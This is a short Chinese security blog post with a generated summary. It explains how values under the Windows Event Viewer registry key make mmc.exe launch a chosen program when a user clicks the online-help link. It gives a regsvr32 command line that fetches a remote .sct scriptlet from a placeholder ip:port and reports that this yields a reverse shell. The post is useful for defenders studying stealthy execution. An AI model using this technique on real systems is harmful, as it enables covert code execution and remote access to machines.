文章总结： 文档介绍了Windows系统中mmc.exe(事件查看器)的一个安全技巧，通过修改注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\EventViewer中的三个键值(MicrosoftRedirectionProgram、MicrosoftRedirectionURL和MicrosoftRedirectionProgramCommandLineParameters)，可以实现隐蔽的代码执行。作者演示了如何利用这些键值执行自定义程序，甚至通过regsvr32.exe参数设置获取反弹shell。虽然这种方法有些鸡肋，但非常隐蔽，是一种值得安全人员注意的攻击技术。 综合评分： 86 文章分类： 漏洞分析,渗透测试,应急响应,红队,安全建设

mmc的tips

原创

MicroPest

MicroPest

2023年4月12日 21:07 安徽

mmc.exe是什么？百度百科：mmc.exe是系统管理程序的一个框架程序，全称是Microsoft Management Console，它提供给扩展名为msc的管理程序一个运行的平台，比如组策略，系统清单，以及打印管理、本地安全策略等等，另外本进程也可能同时运行两个或更多个。

那“事件查看器”是什么，不也是mmc.exe嘛，难道这两个本来就是一个东西？平时还真没注意到。

今天的点就是关于“事件查看器”的，这个我们很熟悉，经常用到嘛，但我们是真是熟悉么，不见得，我就是被虐了一把。

在“注册表”的这个位置：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Event Viewer

有三个键：

这三个键有什么作用呢？

我先生成一个空的exe程序，

1、填充在上面的第一个键值处MicrosoftRedirectionProgram，当被调用时弹出一个窗体，表示被执行了：

现在，运行“事件查看器”，随便选一个事件打开，如下：

点击“事件日志联机帮助”，弹出下图，选择“是”，

这时候就会弹出我们的空程序窗体，表明在这里是通过注册表中那个键值运行了我们的程序。

2、填充在第三个键值处MicrosoftRedirectionURL：

当我们进行同1一样的操作时，也会调用我们的程序，如下显示父进程mmc调用了程序1.exe。

3、MicrosoftRedirectionProgramCommandLineParameters:

这里是第一个键值的参数值。如果第一键值处我们设置为regsvr32.exe，先来看下regsvr32.exe这个程序的参数：

那么，我们这里设置为：/s/n/u/ihttp://ip:port/program.sct program.dll，当点击后，出现了反弹shell，

至此，这里的tips演示完毕。实说，这三个键值的利用有点“鸡肋”，但不失为一种很隐蔽的方法。